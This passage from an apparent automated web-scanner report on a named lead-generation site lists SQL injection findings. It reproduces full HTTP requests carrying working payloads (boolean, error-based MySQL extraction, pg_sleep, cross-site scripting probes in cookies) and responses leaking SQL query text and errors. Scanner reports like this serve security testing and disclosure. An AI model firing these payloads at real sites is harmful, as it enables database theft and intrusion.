GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc''&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.63. http://www.insideup.com/ppc/leadflow/bulo00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. The payloads 12618592'%20or%201%3d1--%20 and 12618592'%20or%201%3d2--%20 were each submitted in the iusrc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc12618592'%20or%201%3d1--%20&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:36:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qmsa4qk6f6a277ipovte01ir11; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc12618592'%20or%201%3d2--%20&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:36:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eu529jf3n9dqnu2r7nvufqqha3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Business Loans, Use InsideUp to Get Quotes and Compare Business Loan Providers </title>
   <meta name="description" content="Let business loan providers compete for your loan needs. Compare local and national business loan companies."/>
   <meta name="keywords" content=" Business Loans "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 15    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11, #step_12, #step_13, #step_14, #step_15, #step_16,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" vali
...[SNIP]...

1.64. http://www.insideup.com/ppc/leadflow/bulo00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lastname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:29:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

1.65. http://www.insideup.com/ppc/leadflow/bulo00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
